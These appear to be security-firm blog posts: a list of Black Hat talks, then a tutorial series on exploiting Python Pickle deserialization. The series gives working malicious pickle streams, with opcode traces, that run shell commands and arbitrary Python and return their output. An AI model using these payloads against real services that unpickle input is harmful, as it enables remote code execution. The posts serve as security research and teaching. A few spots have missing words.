
Sat, 1 Jun 2013

Honey, I’m home!! - Hacking Z-Wave & other Black Hat news

You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.

Under the hood, the Zigbee and Z-Wave wireless communication protocols are the most commonly used RF technologies in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security research projects. Z-Wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical (ISM) radio band. It transmits on the 868.42 MHz (Europe) and 908.42 MHz (United States) frequencies and is designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.

Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol, except once during a DefCon 2011 talk when the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and shows how the Z-Wave protocol can be subjected to attacks.

The talk is being presented by Behrang Fouladi, a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured out how to clone the SecurID software token.

Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:

2002: Setiri : Advances in trojan technology (Roelof Temmingh)

Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it got referenced in a 2004 book by Ed Skoudis.

2003: Putting the tea back into cyber terrorism (Charl van der Walt, Roelof Temmingh and Haroon Meer)

A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually led to the creation of Maltego.

2004: When the tables turn (Charl van der Walt, Roelof Temmingh and Haroon Meer)

This paper presented some of the earliest ideas on offensive strike-back as a network defence methodology, which later found their way into Neil Wyler's 2005 book "Aggressive Network Self-Defence".

2005: Assessment automation (Roelof Temmingh)

Our thinking around pentest automation, and in particular footprinting and link analysis, was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".

2006: A tail of two proxies (Roelof Temmingh and Haroon Meer)

In this talk we literally did introduce two proxy tools. The first was "Suru", our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been bypassed by excellent tools like "Burp Proxy", it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.

Another pioneering MITM proxy - WebScarab from OWASP - also shifted thinking at the time. It was originally written by Rogan Dawes, our very own pentest team leader.

The second proxy we introduced operated at the TCP layer, leveraging off the very excellent Scapy packet manipulation program. We never took that any further, however.

2007: It's all about timing (Haroon Meer and Marco Slaviero)

This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.

2008: Pushing a camel through the eye of a needle (Haroon Meer, Marco Slaviero & Glenn Wilkinson)

In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.

2009: Clobbering the cloud (Haroon Meer, Marco Slaviero and Nicholas Arvanitis)

Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in were discussed. The cloud offerings from Amazon, Salesforce and Apple as well as their security were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Dai Zovi. We built an HTTP brute-forcer on and (best of all) we hacked Apple using an iPhone.

2010: Cache on delivery (Marco Slaviero)

This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers and gave a few examples, including a sexy hack of It seemed like people weren't getting our point at first, but later the penny dropped and we've to-date had almost 50,000 hits on the presentation on Slideshare.

2011: Sour pickles (Marco Slaviero)

Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outlined hurdles facing a shellcoder and provided guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library. We also wrote a very fancy paper about it all...

We never presented at Black Hat USA in 2012, although we did do some very cool work in that year.

For this year's show we'll be back on the podium with Behrang's talk, as well as an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.

See you in Vegas!

Mon, 8 Aug 2011

BlackHat 2011 Presentation

On this past Thursday we spoke at BlackHat USA on Python Pickle. In the presentation, we covered approaches for implementing missing functionality in Pickle, automating the conversion of Python calls into Pickle opcodes, scenarios in which attacks are possible and guidelines for writing shellcode. Two tools were released:

  1. — automates conversion from Python-like statements into shellcode.
  2. Anapickle — helps with the creation of malicious pickles. Contains the shellcode library.
Lastly, we demonstrated bugs in a library, a piece of security software, typical web apps, peer-to-peer software and a privesc bug on RHEL6.

Slides are available below, the whitepaper is here and tools here.

Thu, 24 Feb 2011

Playing with Python Pickle #3

[This is the third in a series of posts on Pickle. Link to part one and two.]

Thanks for stopping by. This is the third posting on the bowels of Python Pickle, and it's going to get a little more complicated before it gets easier. In the previous two entries I introduced Pickle as an attack vector present in many memcached instances, and documented tricks for executing OS commands across Python versions as well as a mechanism for generically calling class instance methods from within the Pickle VM.

In this post we'll look at executing pure Python code from within a Pickle stream. While running os.system() or one of its cousins is almost always a necessity, having access to a Python interpreter means that your exploits can be that much more efficient (no shell syntax to worry about, slightly more portable exploits). I imagine one would tend to combine the pure Python with os.system() calls.

Normal execution of pure Python

Dynamic Python execution is normally achieved through the 'exec' statement. However, since 'exec' is a Python statement and not a class method, the depickler knows nothing about 'exec'. __builtin__.eval() on the other hand is a function that the depickler can call; however eval() normally takes an expression only. Thus,

eval("import os; os.system('ls')")

fails. It's worth noting that one can still call methods in expressions, so

eval("os.system('ls')")

can work if the 'os' module is present in the environment. If it isn't, you can still import 'os' with the expression:

eval("__import__('os').system('ls')")

or even execute a full code block with a double eval():

eval('eval(compile("import os;os.system(\\"ls\\")","q","exec"))')

Moral of that story: don't ever eval() untrusted input. Obviously.
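To make the expression-versus-statement distinction concrete, here is a minimal sketch. It assumes Python 3 (eval() treats these inputs the same way as in the Python 2 examples above) and calls the harmless os.getpid() instead of os.system('ls'). The helper name try_eval is made up for illustration.

```python
import os


def try_eval(source):
    """Evaluate source as an expression; report a SyntaxError instead of raising."""
    try:
        return ("ok", eval(source))
    except SyntaxError:
        return ("syntax error", None)


# A statement list is rejected, because eval() only accepts expressions.
statement_attempt = try_eval("import os; os.getpid()")

# __import__ is an ordinary function call, so it is a valid expression.
expression_attempt = try_eval("__import__('os').getpid()")

# compile(..., "exec") accepts statements. eval() runs the code object but
# returns None, so any result has to be read from the namespace afterwards.
namespace = {}
code_object = compile("import os; pid = os.getpid()", "<demo>", "exec")
exec_mode_return = eval(code_object, namespace)
```

After this runs, statement_attempt holds the syntax error marker, expression_attempt holds the current process ID, and namespace["pid"] holds the value computed by the compiled script.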

However, we want to execute not only expressions but full Python scripts. eval() will also accept a code object, which is produced by compile(), and compile() will accept a full Python script. For example, to prove execution here's the venerable timed wait:

cmd = "import os; f=os.popen('sleep 10');"
c = compile(cmd,"foo","exec")
eval(c)

Reaching into eval'ed code

Continuing with eval(), we try a similar example except we execute 'ls' instead of sleep (and do it in one line of Python). There's an important distinction here, and that is the return value of eval; notice how 'ls' returns nothing:

>>> ret=eval(compile("import os; f=os.popen('ls');","foo","exec"))
>>> print ret
None

This is because eval() always returns None if the supplied code object was compiled with "exec", which means we need a different trick for extracting the contents of the eval'ed script. Luckily our first idea worked (yay), so we didn't look further; there may be better/faster/easier options. That idea was to modify the script's globals (variables scoped for the entire script) inside the eval() call, and access those globals outside the eval() call. This works, as globals are passed into eval() and changes are reflected after the call returns:

>>> print smashed
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'smashed' is not defined
>>> eval(compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec"))
>>> print smashed
Desktop
Documents
Downloads
Library
Movies
Music
...
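The same globals trick can be sketched with an explicit dictionary, which makes it easier to see where the value ends up. This is only an illustration under a few assumptions: Python 3, a shell that understands echo, and a dict named shared standing in for the interpreter's real globals.

```python
# Explicit dict standing in for the globals that eval() would otherwise inherit.
shared = {}

# The script assigns the command output to the name "smashed".
source = (
    "import os\n"
    "f = os.popen('echo hello')\n"
    "smashed = f.read()\n"
    "f.close()\n"
)

# A code object compiled in "exec" mode always makes eval() return None...
ret = eval(compile(source, "foo", "exec"), shared)

# ...but names assigned by the script survive in the dict that was passed in.
output = shared["smashed"]
```

Passing a dict explicitly is a design choice for the demo only; in the Pickle streams below the dict comes from calling globals() inside the depickler.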

Converting to Pickle

In the example above, the global "smashed" is created inside eval(), and carried into the outer environment. It is quite easy to convert the eval(compile()) pattern into a Pickle:

c__builtin__
eval
(c__builtin__
compile
(S'import os\np=os.popen("ls -al")\nsmashed=p.read()\n'
S""
S"exec"
tRc__builtin__
globals
)RtRc__builtin__
globals
)R.

This executes 'ls -al', stores the output in the "smashed" global variable and returns the whole globals dict as the end result of depickling. However, it is messy; globals contains other entries, which wastes space and makes the output harder to read. If we're inserting this into a broader pickle, we'd like to have more control (i.e. return a single string) rather than hope that whatever object we are injecting into can handle a dict.

Final exercise

Pickle does not appear to have a way of referencing dict entries (i.e. globals()['smashed'] in Python), so again we have to dig into the docs. The dict builtin supports a "get" method, but requires a class instance... which should sound a little familiar if you still recall the trick from the last post on reading output from os.popen. In Python terms what we're doing is:

code=compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec")
eval(code)
__builtin__.apply(__builtin__.getattr(__builtin__.dict,"get"),(__builtin__.globals(),"smashed"))

Converted into Pickle we get:

c__builtin__
eval
(c__builtin__
compile
(S'import os\np=os.popen("ls -al")\nsmashed=p.read()\n'
S""
S"exec"
tRc__builtin__
globals
)RtR0(c__builtin__
globals
)RS"smashed"
tp0
0c__builtin__
getattr
(c__builtin__
dict
S"get"
tRp1
0c__builtin__
apply
(g1
g0
tR.

The execution trace of this Pickle stream is:

  1. 'c' -> find the callable "__builtin__.eval", push it onto the stack [SB] [__builtin__.eval]
  2. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK]
  3. 'c' -> find the callable "__builtin__.compile", push it onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile]
  4. '(' -> push a MARK onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK]
  5. "S'import os\np=os.popen("ls -al")\nsmashed=p.read()\n'" -> push 'import os\np=os.popen("ls -al")\nsmashed=p.read()\n' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\np=os.popen("ls -al")\nsmashed=p.read()\n']
  6. "S''" -> push '' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\np=os.popen("ls -al")\nsmashed=p.read()\n'] ['']
  7. "S'exec'" -> push 'exec' onto the stack [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\np=os.popen("ls -al")\nsmashed=p.read()\n'] [''] ['exec']
  8. 't' -> pop 'import os\np=os.popen("ls -al")\nsmashed=p.read()\n','','exec' and MARK, push ('import os\np=os.popen("ls -al")\nsmashed=p.read()\n','','exec') [SB] [__builtin__.eval] [MARK] [__builtin__.compile] [('import os\np=os.popen("ls -al")\nsmashed=p.read()\n','','exec')]
  9. 'R' -> pop "__builtin__.compile" and "('import os\np=os.popen("ls -al")\nsmashed=p.read()\n','','exec')", call __builtin__.compile('import os\np=os.popen("ls -al")\nsmashed=p.read()\n','','exec'), push the code object onto the stack [SB] [__builtin__.eval] [MARK] [code_object]
  10. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals]
  11. ')' -> push an empty tuple onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals] [()]
  12. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [__builtin__.eval] [MARK] [code_object] [<globals dict>]
  13. 't' -> pop code_object, <globals dict> and MARK, push (code_object, <globals dict>) [SB] [__builtin__.eval] [(code_object, <globals dict>)]
  14. 'R' -> pop "__builtin__.eval" and "(code_object, <globals dict>)", call __builtin__.eval(code_object, <globals dict>), push None onto the stack [SB] [None]
  15. '0' -> pop None from the stack [SB]
  16. '(' -> push a MARK onto the stack [SB] [MARK]
  17. 'c' -> find the callable "__builtin__.globals", push it onto the stack [SB] [MARK] [__builtin__.globals]
  18. ')' -> push an empty tuple onto the stack [SB] [MARK] [__builtin__.globals] [()]
  19. 'R' -> pop "__builtin__.globals" and "()", call __builtin__.globals(), push the dict onto the stack [SB] [MARK] [<globals dict>]
  20. "S'smashed'" -> push 'smashed' onto the stack [SB] [MARK] [<globals dict>] ['smashed']
  21. 't' -> pop <globals dict>, 'smashed' and MARK, push (<globals dict>, 'smashed') [SB] [(<globals dict>,'smashed')]
  22. 'p0' -> store (<globals dict>, 'smashed') in register 0 [SB] [(<globals dict>,'smashed')]
  23. '0' -> pop (<globals dict>, 'smashed') from the stack [SB]
  24. 'c' -> find the callable "__builtin__.getattr", push it onto the stack [SB] [__builtin__.getattr]
  25. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  26. 'c' -> find the callable "__builtin__.dict", push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict]
  27. "S'get'" -> push 'get' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.dict] ['get']
  28. 't' -> pop __builtin__.dict,'get' and MARK, push (__builtin__.dict,'get') [SB] [__builtin__.getattr] (__builtin__.dict,'get')
  29. 'R' -> pop "__builtin__.getattr" and "(__builtin__.dict,'get')", call __builtin__.getattr(__builtin__.dict,'get'), push the attribute onto the stack [SB] [dict.get]
  30. 'p1' -> store dict.get in register 1 [SB] [dict.get]
  31. '0' -> pop dict.get from the stack [SB]
  32. 'c' -> find the callable "__builtin__.apply", push it onto the stack [SB] [__builtin__.apply]
  33. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  34. 'g1' -> push dict.get from register 1 [SB] [__builtin__.apply] [MARK] [dict.get]
  35. 'g0' -> push (<globals dict>, 'smashed') from register 0 [SB] [__builtin__.apply] [MARK] [dict.get] [(<globals dict>, 'smashed')]
  36. 't' -> pop dict.get, (<globals dict>, 'smashed') and MARK, push (dict.get, (<globals dict>, 'smashed')) [SB] [__builtin__.apply] [(dict.get,(<globals dict>, 'smashed'))]
  37. 'R' -> pop "__builtin__.apply" and "(dict.get,(<globals dict>, 'smashed'))", call __builtin__.apply(dict.get,(<globals dict>, 'smashed')), push the "smashed" value onto the stack [SB] ["Desktop\nDocuments\nDownloads\n..."]
  38. '.' -> pop and return value of "smashed", exit [SB]
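The stream above is Python 2 only: __builtin__ has since been renamed to builtins, and apply no longer exists. For readers on Python 3, the following is a rough adaptation rather than the stream from this post. It assumes a shell that understands echo, runs 'echo hello' instead of 'ls -al', and lets the 'R' opcode call dict.get directly instead of going through apply and the memo. Which namespace globals() resolves to depends on the unpickler implementation; the sketch only relies on both globals() calls returning the same dict.

```python
import pickle

# Script executed inside the unpickler; it leaves its output in the global "smashed".
source = 'import os\np=os.popen("echo hello")\nsmashed=p.read()\np.close()\n'

parts = [
    b"cbuiltins\neval\n",                          # c: push builtins.eval
    b"(cbuiltins\ncompile\n",                      # (: MARK, c: push builtins.compile
    b"(S" + repr(source).encode("ascii") + b"\n",  # (: MARK, S: the script text
    b"S'<pickle>'\n",                              # S: filename argument for compile()
    b"S'exec'\n",                                  # S: compile mode
    b"tR",                                         # t, R: call compile(...) -> code object
    b"cbuiltins\nglobals\n)R",                     # c, ), R: call globals() -> dict
    b"tR",                                         # t, R: call eval(code, globals) -> None
    b"0",                                          # 0: discard the None
    b"cbuiltins\ngetattr\n",                       # c: push builtins.getattr
    b"(cbuiltins\ndict\nS'get'\ntR",               # getattr(dict, 'get') -> dict.get
    b"(cbuiltins\nglobals\n)R",                    # (: MARK, then globals() again
    b"S'smashed'\n",                               # S: the key to look up
    b"tR",                                         # t, R: dict.get(globals, 'smashed')
    b".",                                          # .: return the value of "smashed"
]
stream = b"".join(parts)

result = pickle.loads(stream)
```

The repr() call is used to produce the quoted, escaped form that the 'S' opcode expects, which avoids hand-escaping the newlines in the script.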

Ending off

This post demonstrates a few concepts that are of interest to the Pickle hacker. We showed how to construct a Pickle stream such that arbitrary Python was executed during the deserialization process, we mentioned that it was possible to carry information from within an eval() call into the executing environment of the depickler, and finally we revisited the trick for indirectly calling class instance methods in order to return eval()'s value as the depickled object.

In the last posting on this topic, we'll look at tactical uses for all the Pickle hacking we've covered: where to find Pickle objects, where they're processed and how to modify objects in place. Stay tuned.

Mon, 15 Nov 2010

Playing with Python Pickle #2

[This is the second in a series of posts on Pickle. Link to part one.]

In the previous post I introduced Python's Pickle mechanism for serializing and deserializing data and provided a bit of background regarding where we came across serialized data, how the virtual machine works and noted that Python intentionally does not perform security checks when unpickling.

In this post, we'll work through a number of examples that depict exactly why unpickling untrusted data is a dangerous operation. Since we're going to handcraft Pickle streams, it helps to have an opcode reference handy; here are the opcodes we'll use:

  • c<module>\n<function>\n -> push <module>.<function> onto the stack. It's actually more subtle than this but this simplification works for us.
  • ( -> push a MARK object onto the stack.
  • S'<string>'\n -> Push <string> object onto the stack.
  • V<string>\n -> Push Unicode <string> object onto the stack (unlike 'S', the string is not quoted).
  • l -> pop everything off the stack up to the topmost MARK object, create a list with the objects (excl MARK) and push the list back onto the stack
  • t -> pop everything off the stack up to the topmost MARK object, create a tuple with the objects (excl MARK) and push the tuple back onto the stack
  • R -> pop two objects off the stack; the top object is treated as the argument tuple and the lower object is a callable (function object). Apply the function to the arguments and push the result back onto the stack
  • p<index>\n -> Peek at the top stack object and store it in memo or register <index>.
  • g<index>\n -> Grab an object from memo or register <index> and push onto the stack.
  • 0 -> Pop and discard the topmost stack item.
  • . -> Terminate the virtual machine. If you're pasting the examples below into larger Pickle streams, make sure to remove the '.'
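A quick way to check a handcrafted stream against the opcode list above is the standard library's pickletools module. The sketch below assumes Python 3, where streams are bytes; the tiny stream itself is made up for illustration and only builds a list.

```python
import pickle
import pickletools

# MARK, two strings, 'l' to build a list from everything above the MARK, then STOP.
stream = b"(S'uname'\nS'-a'\nl."

# genops() yields (opcode, argument, position) for each instruction in the stream.
opcode_names = [opcode.name for opcode, arg, pos in pickletools.genops(stream)]

# Loading the stream returns the single object left on the stack.
value = pickle.loads(stream)
```

pickletools.dis(stream) prints the same information as an annotated listing, which is handy when a longer stream fails to load.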
Executing OS commands

In the previous post, the canonical abuse case for unpickling untrusted data was listed:

cos
system
(S'echo hello world'
tR.

Let's step through this (the stack is included after each step, [SB] indicates the stack bottom):

  1. 'c' -> find the callable "os.system", push the callable onto the stack. [SB] [os.system]
  2. '(' -> push a MARK onto the stack [SB] [os.system] [MARK]
  3. "S'echo hello world'" -> push 'echo hello world' onto the stack [SB] [os.system] [MARK] ['echo hello world']
  4. 't' -> pop "echo hello world" and MARK, push the tuple "('echo hello world')" onto the stack [SB] [os.system] [('echo hello world')]
  5. 'R' -> pop "('echo hello world')" and "os.system", call os.system('echo hello world'), push the result back on the stack [SB] [0]
  6. '.' -> pop the result off the stack and terminate [SB], result was '0'
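The six steps above can be reproduced directly. This is a small sketch assuming Python 3, where the stream has to be a bytes object, and a shell in which 'echo hello world' succeeds.

```python
import pickle

# c: push os.system; (: MARK; S: the command string; t: build the argument
# tuple; R: call os.system(...); .: return whatever is left on the stack.
stream = b"cos\nsystem\n(S'echo hello world'\ntR."

# The command's output goes to this process's stdout, not into the result.
exit_status = pickle.loads(stream)
```

The depickled "object" is just the shell's return status, which is why the command output is not visible to whoever receives the reconstructed object.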

Perhaps one instruction that should be clarified is 'c', which loads a class based on the two arguments 'module' and 'class'. Pickle's docs define the behaviour as follows: "The class object module.class is pushed on the stack. More accurately, the object returned by self.find_class(module, class) is pushed on the stack". Our previous simplified definition said that the 'c' instruction loaded function references, and this is the case, however the full explanation shows that more types than function references can be loaded.

For our purposes we want to load classes that are callable, which is a requirement for the 'R' instruction. A callable is an object that has a "__call__" attribute which, if you're also not a Python programmer, means having to search for more information. A non-expert definition is something like: if the module has functions (e.g. os.system()) then these are suitable for 'c'. However, class instance method objects (e.g. the methods of x after x=Foo()) are not suitable for the 'c' opcode since it cannot handle class instances. It is also worth pointing out that the 'R' opcode doesn't care about what type of object it executes, so long as the object responds to "__call__". The interplay between 'c' and 'R' is important for the approach shown later, since 'c' is quite limited but 'R' can handle more types of objects.

What this rat-hole concludes with is that we have not come across a Pickle example showing how to execute method calls on class instance objects.


Let's try to improve on the command execution example; it's cute for executing commands, but if the unpickling happens on an app server then we won't see the output of "os.system()" since it returns the retval of the shell rather than stdout/stderr. Any output of the command is printed to the server's stdout. Thus for our 'echo hello world' example, the unpickling returns '0' even though the command successfully ran.

Our first goal is to retrieve the output of commands in the reconstructed object. Initial ideas focused on manipulating the shell's return value to carry over output:

cos
system
(S'printf -v a \'%d\' "\'`uname -a | sed \'s/.\\{2\\}\\(.\\).*/\\1/\'`";exit $a;'
tR.

This uses a combination of the shell's backtick and printf statements, sed and exit to return one character at a time in the exit status. However this too is messy; if the output changes between invocations this approach is pretty worthless and it's also noisy and low bandwidth.

The next option was "os.popen", however we quickly became bogged down. "os.popen()" returns an instance (e.g. proc=os.popen("echo foo")) and in order to access the output of the command, we'd need to call "proc.read()". However, the pickle instruction set doesn't appear to support calling instance methods directly, as we've already mentioned. The next option was to look for other modules, and the 'subprocess' module did the trick with its 'check_output()' function, which takes an executable and a set of arguments, runs the executable on the arguments and returns the output as a string:

csubprocess
check_output
(S'uname'
tR.



This looks like good news in that we're executing commands and viewing output, however the downsides quickly become apparent. "subprocess.check_output" does not invoke a shell, so we can't simply pass in "uname -a" as a single string, it needs to be broken up into arguments. More importantly though, "check_output" was only added in Python 2.7, so with earlier versions this won't work. We can easily overcome the first of these hurdles; "check_output" will take arguments specified in a list like so:

subprocess.check_output(["uname", "-a"])

We just need to craft the instructions to create a list and leave it on the stack:

csubprocess
check_output
((S'uname'
S'-a'
ltR.

This is identical to the previous example except for the additional MARK instruction '(', the '-a' string argument and the 'l' instruction to build a list from the previous MARK. This is a rough execution trace of the VM on the instruction sequence:

  1. 'c' -> find the callable "subprocess.check_output", push the callable onto the stack. [SB] [subprocess.check_output]
  2. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK]
  3. '(' -> push a MARK onto the stack [SB] [subprocess.check_output] [MARK] [MARK]
  4. "S'uname'" -> push 'uname' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname']
  5. "S'-a'" -> push '-a' onto the stack [SB] [subprocess.check_output] [MARK] [MARK] ['uname'] ['-a']
  6. 'l' -> pop "uname", "-a" and MARK, push the list "['uname','-a']" onto the stack [SB] [subprocess.check_output] [MARK] [['uname','-a']]
  7. 't' -> pop "['uname','-a']" and MARK, push the tuple "(['uname','-a'])" onto the stack [SB] [subprocess.check_output] [(['uname','-a'])]
  8. 'R' -> pop "(['uname','-a'])" and "subprocess.check_output()", call subprocess.check_output((['uname','-a'])), push the result back on the stack [SB] ['Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n']
  9. '.' -> pop the result off the stack and terminate [SB], result was 'Darwin insurrection.local 10.4.0 Darwin Kernel Version 10.4.0: Fri Apr 23 18:28:53 PDT 2010; root:xnu-1504.7.4~1/RELEASE_I386 i386\n'
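Both points about "check_output" (no shell, arguments as a list) can be seen in a short sketch. It assumes Python 3, where the output comes back as bytes, and a POSIX system with an echo executable on the PATH; it runs 'echo hello' rather than 'uname -a' so the result is predictable.

```python
import pickle

# check_output(['echo', 'hello']): the inner MARK ... 'l' builds the list,
# the outer MARK ... 't' wraps it in the one-element argument tuple.
list_stream = b"csubprocess\ncheck_output\n((S'echo'\nS'hello'\nltR."
output = pickle.loads(list_stream)

# Passing the whole command line as one string fails, because no shell
# splits it: the entire string is treated as the program name.
string_stream = b"csubprocess\ncheck_output\n(S'echo hello'\ntR."
try:
    pickle.loads(string_stream)
    single_string_failed = False
except OSError:
    single_string_failed = True
```

The exception raised inside the unpickler propagates to the caller of pickle.loads(), so a malformed command shows up as an ordinary Python error.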
The result unfortunately carries a trailing newline, which is ugly. We can make use of the virtual machine to clean up the output for us, by calling "string.strip()" on the output:

cstring
strip
(csubprocess
check_output
((S'uname'
S'-a'
ltRtR.

The trace has been omitted since it just includes another function call, but the approach hints at how one might go about dealing with class instances: attempt to call a module function on the class instance.

If the "check_output" method is relied upon, then we're still stuck with Python 2.7. Ideally we'd like to run "p=os.popen('ls -al'); p.read()", however since the 'c' instruction requires modules and classes, and cannot handle class instances, it is not possible to perform this directly. It bears repeating though that the 'R' instruction can handle references to instance methods, since they are inherently callable. Thus we need to find a way to call an instance method using only functions. Cue a diversion into Python's introspection support:

  • __builtin__.getattr(foo, "attribute") returns foo.attribute, e.g. __builtin__.getattr(file, "read") -> file.read
  • __builtin__.apply(func, [args]) executes func([args])
Using the introspection tricks and without calling methods on class instances explicitly, we can execute "p=os.popen('ls -al'); p.read()" with the following Python:

__builtin__.apply(__builtin__.getattr(file,"read"),[os.popen("ls -al")])

Converted into Pickle, this becomes:

cos
popen
(S'ls -al'
tRp0
0c__builtin__
getattr
(c__builtin__
file
S"read"
tRp1
0c__builtin__
apply
(g1
(g0
ltR.

That's quite a mouthful, here's the breakdown:

  1. 'c' -> find the callable "os.popen", push it onto the stack [SB] [os.popen]
  2. '(' -> push a MARK onto the stack [SB] [os.popen] [MARK]
  3. "S'ls -al'" -> push 'ls -al' onto the stack [SB] [os.popen] [MARK] ['ls -al']
  4. 't' -> pop 'ls -al' and MARK, push ('ls -al') [SB] [os.popen] [('ls -al')]
  5. 'R' -> pop "os.popen" and "('ls -al')", call os.popen('ls -al'), push the opened file object onto the stack [SB] [<open file>]
  6. 'p0' -> store "<open file>" in register 0 [SB] [<open file>]
  7. '0' -> pop and discard topmost stack item [SB]
  8. 'c' -> find the callable '__builtin__.getattr', push it onto the stack [SB] [__builtin__.getattr]
  9. '(' -> push a MARK onto the stack [SB] [__builtin__.getattr] [MARK]
  10. 'c' -> find the callable '__builtin__.file', push it onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file]
  11. "S'read'" -> push 'read' onto the stack [SB] [__builtin__.getattr] [MARK] [__builtin__.file] ['read']
  12. 't' -> pop 'read', "__builtin__.file" and MARK, push (__builtin__.file, 'read') [SB] [__builtin__.getattr] [(__builtin__.file, 'read')]
  13. 'R' -> pop "__builtin__.getattr" and "(__builtin__.file, 'read')", call __builtin__.getattr(__builtin__.file, 'read'), push the returned object onto the stack [SB] [<method object for 'file.read'>]
  14. 'p1' -> store "<method object for 'file.read'>" in register 1 [SB] [<method object for 'file.read'>]
  15. '0' -> pop and discard topmost stack item [SB]
  16. 'c' -> find the callable '__builtin__.apply', push it onto the stack [SB] [__builtin__.apply]
  17. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK]
  18. 'g1' -> retrieve contents of register 1, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>]
  19. '(' -> push a MARK onto the stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK]
  20. 'g0' -> retrieve contents of register 0, push onto stack [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [MARK] [<open file>]
  21. 'l' -> pop "<open file>" and MARK, push the list "[<open file>]" [SB] [__builtin__.apply] [MARK] [<method object for 'file.read'>] [[<open file>]]
  22. 't' -> pop "<method object for 'file.read'>", "[<open file>]" and MARK, push the tuple "(<method object for 'file.read'>, [<open file>])" [SB] [__builtin__.apply] [(<method object for 'file.read'>,[<open file>])]
  23. 'R' -> pop "__builtin__.apply" and "(<method object for 'file.read'>,[<open file>])", call __builtin__.apply(<method object for 'file.read'>,[<open file>]), push the returned object onto the stack [SB] ['lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n']
  24. '.' -> pop the result off the stack and terminate [SB], returned string was "lrwxr-xr-x@ 1 root wheel 11 Mar 7 2010 /tmp -> private/tmp\n"
This is really useful, since we can now return command output in any Python version that supports Pickle.
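Neither apply nor the file builtin survived into Python 3, so the stream above will not load there. As a hedged sketch of the same idea (call an instance method using only functions), the variant below fetches the bound read method with getattr and then lets 'R' call it with an empty argument tuple. This is a different construction from the one in this post; it assumes Python 3 and a shell that understands echo.

```python
import pickle

stream = (
    b"cbuiltins\ngetattr\n"   # c: push builtins.getattr
    b"(cos\npopen\n"          # (: MARK, c: push os.popen
    b"(S'echo hello'\ntR"     # call os.popen('echo hello') -> pipe object
    b"S'read'\n"              # S: name of the attribute to fetch
    b"tR"                     # t, R: getattr(pipe, 'read') -> bound method
    b"(tR"                    # (, t, R: call the bound method with no arguments
    b"."                      # .: return the command output
)

output = pickle.loads(stream)
```

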